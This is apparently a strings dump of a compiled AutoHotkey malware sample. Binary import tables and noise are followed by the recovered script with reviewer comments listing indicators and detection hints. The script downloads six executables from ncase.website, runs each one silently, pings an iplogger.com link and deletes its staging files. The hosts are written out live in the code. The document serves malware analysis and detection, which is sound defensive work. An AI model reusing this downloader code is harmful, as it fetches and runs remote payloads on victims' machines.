]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
SendInput
KbdLayerDescriptor
RtlGetVersion
RemoveClipboardFormatListener
AddClipboardFormatListener
BlockInput
GetProcessId
""""&*.266::>>>CCCCCHMMVV$
GetLayeredWindowAttributes
EnumDisplayMonitors
GetMonitorInfoW
GetDiskFreeSpaceExW
GetCursorInfo
CreateProcessWithLogonW
InternetOpenW
InternetOpenUrlW
InternetCloseHandle
InternetReadFileExA
InternetReadFile
CreateToolhelp32Snapshot
Process32FirstW
Process32NextW
AtlAxGetControl
AtlAxWinInit
StrCmpLogicalW
SetMenuInfo
RegDeleteKeyExW
GdiplusStartup
GdiplusShutdown
GdipCreateBitmapFromFile
GdipCreateHBITMAPFromBitmap
GdipDisposeImage
SetWindowTheme
EnableThemeDialogTexture
IsAppThemed
IsHungAppWindow
Error text not found (please report)
DEFINE
UTF16)
NO_START_OPT)
ANYCRLF)
BSR_ANYCRLF)
BSR_UNICODE)
argument is not a compiled regular expression
argument is compiled in 8 bit mode
internal error: opcode not recognized
internal error: missing capturing bracket
failed to get memory
Access violation - no RTTI data!
Bad dynamic_cast!
2]fQ	?5!
?UUUUUU
?UUUUUU
?UUUUUU
?UUUUUU
UUUUUU
UUUUUU
UUUUUU
UUUUUU
"e?<<<<<<l?
Il?333333c?
.i?0@I
d?000000`?
)|B?d!
L?UUUUUUU?
&?PPPPPPP?
0X8b?~
%GoU?*
(T?j?Y
Zod(^?
D W?{W
qS>g?h3
c?FA@s}
UUUUUU
UUUUUU
?UUUUUU
?UUUUUU
?UUUUUU
UUUUUU
UUUUUU
@^8U)zj
?8bunz8
?@En[vP
[*ncd>0
S>$hkDh$h>[2
UA>N0Wl
A03>A|
Q5rHg,>
j>>A?1
.>PJ;I:qE>
:>t6k'
])6M>&
CWD>~3
:>)*	v
_oD>Kg
N>O=I9
F>qUxv
/2GG>!B
zY;>u:m	
P>q_Y~
0><[cZUg^>
Y>kX>M
H[><y5
.text$di
.text$mn
.text$mn$00
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XLA
.CRT$XLZ
.CRT$XPA
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$T
.rdata$r
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.pdata
.gfids$x
.gfids$y
.tls$ZZZ
.rsrc$01
.rsrc$02
?t @7d
WSOCK32.dll
joyGetPosEx
mciSendStringW
mixerOpen
mixerGetDevCapsW
mixerGetLineInfoW
mixerClose
mixerGetLineControlsW
mixerGetControlDetailsW
mixerSetControlDetails
waveOutGetVolume
waveOutSetVolume
joyGetDevCapsW
WINMM.dll
GetFileVersionInfoSizeW
GetFileVersionInfoW
VerQueryValueW
VERSION.dll
ImageList_GetIconSize
ImageList_Create
ImageList_Destroy
ImageList_AddMasked
ImageList_ReplaceIcon
CreateStatusWindowW
COMCTL32.dll
GetProcessImageFileNameW
GetModuleBaseNameW
GetModuleFileNameExW
PSAPI.DLL
MulDiv
GetTickCount
SetCurrentDirectoryW
InitializeCriticalSection
SetErrorMode
GetCurrentDirectoryW
GlobalLock
GlobalAlloc
GlobalFree
GlobalUnlock
GetCurrentThreadId
lstrcmpiW
GetStringTypeExW
CreateThread
SetThreadPriority
GetExitCodeThread
CloseHandle
CreateMutexW
GetLastError
GetProcAddress
GetModuleHandleW
LoadLibraryW
FreeLibrary
GetVersionExW
GetCPInfo
DeleteCriticalSection
GetModuleFileNameW
GetSystemTimeAsFileTime
FindResourceW
SizeofResource
LoadResource
LockResource
FindFirstFileW
FindNextFileW
FindClose
FileTimeToLocalFileTime
SetEnvironmentVariableW
MoveFileW
OutputDebugStringW
CreateProcessW
GetFileAttributesW
WideCharToMultiByte
MultiByteToWideChar
GetExitCodeProcess
WriteProcessMemory
ReadProcessMemory
GetCurrentProcessId
OpenProcess
TerminateProcess
SetPriorityClass
SetLastError
GetEnvironmentVariableW
GetLocalTime
GetDateFormatW
GetTimeFormatW
GetDiskFreeSpaceW
SetVolumeLabelW
CreateFileW
DeviceIoControl
GetDriveTypeW
GetVolumeInformationW
CreateDirectoryW
ReadFile
WriteFile
DeleteFileW
SetFileAttributesW
LocalFileTimeToFileTime
SetFileTime
GetFileSizeEx
GetSystemTime
GetSystemDefaultUILanguage
GetComputerNameW
GetWindowsDirectoryW
GetTempPathW
GetFullPathNameW
GetShortPathNameW
EnterCriticalSection
LeaveCriticalSection
VirtualProtect
QueryDosDeviceW
CompareStringW
RemoveDirectoryW
CopyFileW
GetCurrentProcess
FormatMessageW
GetPrivateProfileStringW
GetPrivateProfileSectionW
GetPrivateProfileSectionNamesW
WritePrivateProfileStringW
WritePrivateProfileSectionW
SetEndOfFile
GetACP
GetFileType
GetStdHandle
SetFilePointerEx
SystemTimeToFileTime
FileTimeToSystemTime
GetFileSize
IsWow64Process
VirtualAllocEx
VirtualFreeEx
EnumResourceNamesW
LoadLibraryExW
GlobalSize
KERNEL32.DLL
IsClipboardFormatAvailable
CharUpperW
GetDlgCtrlID
GetParent
SetTimer
GetMessageW
GetForegroundWindow
GetWindowThreadProcessId
GetClassNameW
GetFocus
PeekMessageW
KillTimer
TranslateAcceleratorW
GetKeyState
GetWindowLongW
IsWindowEnabled
SendMessageW
IsDialogMessageW
ScreenToClient
SetWindowLongW
CountClipboardFormats
ShowWindow
TranslateMessage
DispatchMessageW
IsWindow
EndDialog
FindWindowW
PostMessageW
EmptyClipboard
SetClipboardData
CloseClipboard
GetClipboardFormatNameW
GetClipboardData
OpenClipboard
ReleaseDC
CharLowerW
CallNextHookEx
GetKeyboardLayout
ToUnicodeEx
IsCharLowerW
IsCharUpperW
IsCharAlphaNumericW
PostThreadMessageW
SetWindowsHookExW
UnhookWindowsHookEx
SendMessageTimeoutW
PostQuitMessage
RegisterHotKey
UnregisterHotKey
SendInput
AttachThreadInput
GetAsyncKeyState
GetCursorPos
GetKeyboardState
SetKeyboardState
keybd_event
GetSystemMetrics
WindowFromPoint
mouse_event
GetWindowTextW
GetGUIThreadInfo
ActivateKeyboardLayout
GetKeyboardLayoutNameW
MapVirtualKeyExW
VkKeyScanExW
MapVirtualKeyW
IsCharAlphaW
DestroyWindow
DestroyIcon
LoadCursorW
RegisterClassExW
CreateWindowExW
GetMenu
EnableMenuItem
LoadAcceleratorsW
SetClipboardViewer
ChangeClipboardChain
LoadImageW
MessageBoxW
CheckMenuItem
IsWindowVisible
SetWindowTextW
GetIconInfo
SetRect
DrawTextW
AdjustWindowRectEx
SystemParametersInfoW
GetClientRect
GetWindowRect
GetQueueStatus
MoveWindow
EnumChildWindows
SetActiveWindow
SetFocus
SetWindowRgn
SetWindowPos
SetLayeredWindowAttributes
InvalidateRect
EnableWindow
GetWindowTextLengthW
EnumWindows
IsZoomed
IsIconic
RegisterWindowMessageW
GetSysColor
GetSysColorBrush
DrawIconEx
FillRect
DefWindowProcW
SetForegroundWindow
DialogBoxParamW
SendDlgItemMessageW
GetDlgItem
SetDlgItemTextW
MessageBeep
ClientToScreen
GetCursor
GetLastInputInfo
GetSystemMenu
GetMenuItemCount
GetMenuItemID
GetSubMenu
GetMenuStringW
ExitWindowsEx
SetMenu
FlashWindow
GetPropW
SetPropW
RemovePropW
MapWindowPoints
RedrawWindow
SetWindowLongPtrW
SetParent
GetClassInfoExW
GetAncestor
UpdateWindow
GetMessagePos
GetClassLongPtrW
DefDlgProcW
CallWindowProcW
CheckRadioButton
IntersectRect
GetUpdateRect
PtInRect
CreateDialogIndirectParamW
GetWindowLongPtrW
CreateAcceleratorTableW
DestroyAcceleratorTable
InsertMenuItemW
SetMenuDefaultItem
RemoveMenu
SetMenuItemInfoW
IsMenu
GetMenuItemInfoW
CreateMenu
CreatePopupMenu
SetMenuInfo
AppendMenuW
DestroyMenu
TrackPopupMenuEx
GetDesktopWindow
CopyImage
CreateIconIndirect
CreateIconFromResourceEx
EnumClipboardFormats
GetWindow
BringWindowToTop
GetTopWindow
USER32.dll
GetDeviceCaps
DeleteObject
CreateFontW
CreateSolidBrush
CreateDCW
GetStockObject
SelectObject
GetTextFaceW
GetTextMetricsW
GetObjectW
DeleteDC
CreateEllipticRgn
CreateRoundRectRgn
CreateRectRgn
CreatePolygonRgn
CreateCompatibleDC
GetDIBits
GetSystemPaletteEntries
CreateCompatibleBitmap
BitBlt
GetPixel
SetBkColor
SetTextColor
ExcludeClipRect
GetClipRgn
FillRgn
GetClipBox
GetCharABCWidthsW
SetBkMode
CreatePatternBrush
SetBrushOrgEx
EnumFontFamiliesExW
CreateDIBSection
GdiFlush
GDI32.dll
GetSaveFileNameW
GetOpenFileNameW
CommDlgExtendedError
COMDLG32.dll
RegConnectRegistryW
RegCloseKey
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumValueW
RegEnumKeyExW
GetUserNameW
OpenSCManagerW
LockServiceDatabase
UnlockServiceDatabase
CloseServiceHandle
OpenProcessToken
LookupPrivilegeValueW
AdjustTokenPrivileges
RegQueryValueExW
RegCreateKeyExW
RegSetValueExW
RegDeleteKeyW
RegDeleteValueW
ADVAPI32.dll
DragQueryFileW
DragFinish
Shell_NotifyIconW
ShellExecuteExW
SHGetFolderPathW
SHGetMalloc
SHGetDesktopFolder
SHBrowseForFolderW
SHGetPathFromIDListW
SHFileOperationW
SHEmptyRecycleBinW
DragQueryPoint
ExtractIconW
SHELL32.dll
OleInitialize
OleUninitialize
CoCreateInstance
CoInitialize
CoUninitialize
CLSIDFromString
CoGetObject
StringFromGUID2
CreateStreamOnHGlobal
ole32.dll
OLEAUT32.dll
SetEvent
ResetEvent
WaitForSingleObjectEx
CreateEventW
RtlCaptureContext
RtlLookupFunctionEntry
RtlVirtualUnwind
IsDebuggerPresent
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetStartupInfoW
IsProcessorFeaturePresent
QueryPerformanceCounter
InitializeSListHead
RtlPcToFileHeader
EncodePointer
RaiseException
RtlUnwindEx
InitializeCriticalSectionAndSpinCount
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetCommandLineA
GetCommandLineW
ExitProcess
GetModuleHandleExW
HeapSize
HeapReAlloc
HeapQueryInformation
HeapFree
HeapAlloc
LCMapStringW
GetStringTypeW
GetConsoleCP
GetConsoleMode
GetProcessHeap
FindFirstFileExW
IsValidCodePage
GetOEMCP
GetEnvironmentStringsW
FreeEnvironmentStringsW
SetStdHandle
FlushFileBuffers
WriteConsoleW
ReadConsoleW
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVexception@std@@
.?AVbad_array_new_length@std@@
.?AVbad_exception@std@@
.?AUIObject@@
.?AVComObject@@
.?AVTextMem@@
.?AVTextFile@@
.?AVExprOpFunc@@
.?AVTextStream@@
.?AVProperty@@
.?AVObjectBase@@
.?AVLabel@@
.?AUIObjectComCompatible@@
.?AUIDispatch@@
.?AUIUnknown@@
.?AVObject@@
.?AVFunc@@
.?AV?$CKuStringT@_WVCKuStringUtilW@@@@
.?AVRegExMatchObject@@
.?AVCStringWCharFromChar@@
.?AVCStringCharFromWChar@@
.?AV?$CKuStringT@DVCKuStringUtilA@@@@
.?AVComArrayEnum@@
.?AVComEnum@@
.?AVComEvent@@
.?AVEnumBase@@
.?AVBoundFunc@@
.?AVMetaObject@@
.?AVEnumerator@Object@@
.?AVFileObject@@
.?AV__non_rtti_object@std@@
.?AVbad_typeid@std@@
.?AVbad_cast@std@@
*--<[_az
*((4FFC]mol
&%&lbbc
[MMxH<<\3,,A)##4
/)##<&  4 
'+,:TY[s
%EGB_svo
<88Ktmm
'''5ZZZp
!!!('''/
4228BAAK
XKKoE;;U<33J%  3
G<<Z'!!/
.02?R]g}
$%#3EKKeu
?A<Wike
0..;]]Zz
(''4SNNi
>>>Ovuu
:::X^^^
_(  q#
eeez@@@[322G
YLLlK??\<33K-&&8%
eTT{M@@a3++?"
; <COMPILER: v1.1.28.02>
; ---------------------------------------------------------------------------
; Analyst notes (added in review; every line not starting with ';' is the
; script text exactly as recovered from the sample's strings).
;
; The line above is a version stamp, presumably written by the AutoHotkey
; script compiler; together with the AutoHotkey runtime strings earlier in
; the dump it suggests the PE is a compiled AutoHotkey v1.1 script -- confirm
; by extracting the script resource.
;
; Behaviour visible in the script: a multi-stage downloader. It creates a
; staging directory, downloads six executables over plain HTTP from one host,
; runs each one, requests an iplogger.com link, waits 60 seconds, deletes the
; staged files and exits.
;
; Indicators taken from the script (hosts written defanged here):
;   host   ncase[.]website   paths /load/sng/run1.exe .. run3.exe
;                                  /load/ya/run4.exe  .. run6.exe
;   host   iplogger[.]com    path  /1YHp67
;   dir    %ProgramData%\Windows
;   files  run1.exe .. run6.exe, jopa.txt (all inside that directory)
; ---------------------------------------------------------------------------

; A newly started copy replaces any instance that is already running.
#SingleInstance force
; No tray icon is shown for the running script.
#NoTrayIcon

; Staging: create %ProgramData%\Windows and make it the working directory, so
; the bare file names used below resolve inside it. The folder name resembles
; a system location; creation of this path is a useful file-system detection.
FileCreateDir, %Programdata%\Windows
SetWorkingDir, %Programdata%\Windows

; Payload 1 of 6. The download is unencrypted HTTP, so the request (and, if
; full capture is available, the payload itself) is visible to a proxy or
; network sensor.
; The While/Continue pair that follows is a wait with no timeout: if the
; download never produces the file, the script spins there and no later
; stage runs.
; UseErrorLevel on Run reports a failed launch through ErrorLevel instead of
; an error dialog; the script never reads ErrorLevel, so failures are silent.
URLDownloadToFile, http://ncase.website/load/sng/run1.exe, run1.exe
While !FileExist("run1.exe")
Continue
sleep 1000
Run, run1.exe,, UseErrorLevel

; Payload 2 of 6 -- same download / wait / one-second pause / run pattern.
URLDownloadToFile, http://ncase.website/load/sng/run2.exe, run2.exe
While !FileExist("run2.exe")
Continue
sleep 1000
Run, run2.exe,, UseErrorLevel

; Payload 3 of 6 -- last one served from /load/sng/.
URLDownloadToFile, http://ncase.website/load/sng/run3.exe, run3.exe
While !FileExist("run3.exe")
Continue
sleep 1000
Run, run3.exe,, UseErrorLevel

; Payload 4 of 6 -- first one served from /load/ya/. What distinguishes the
; two server paths is not evident from the script.
URLDownloadToFile, http://ncase.website/load/ya/run4.exe, run4.exe
While !FileExist("run4.exe")
Continue
sleep 1000
Run, run4.exe,, UseErrorLevel

; Payload 5 of 6.
URLDownloadToFile, http://ncase.website/load/ya/run5.exe, run5.exe
While !FileExist("run5.exe")
Continue
sleep 1000
Run, run5.exe,, UseErrorLevel

; Payload 6 of 6.
URLDownloadToFile, http://ncase.website/load/ya/run6.exe, run6.exe
While !FileExist("run6.exe")
Continue
sleep 1000
Run, run6.exe,, UseErrorLevel

; Requests an iplogger.com link and saves the response as jopa.txt. Nothing
; later in the script reads that file.
; NOTE(review): presumably a check-in that records the host's public IP for
; the operator -- confirm from traffic capture.
UrlDownloadToFile, https://iplogger.com/1YHp67, jopa.txt

; Cleanup: after 60 seconds, delete files matching %ProgramData%\Windows\*
; and exit. The script does not remove the directory itself, so the folder
; should remain as an artifact.
; NOTE(review): payloads still running at this point may be locked and
; survive the delete -- verify in a sandbox before relying on either outcome.
Sleep, 60000
FileDelete, %Programdata%\Windows\*
ExitApp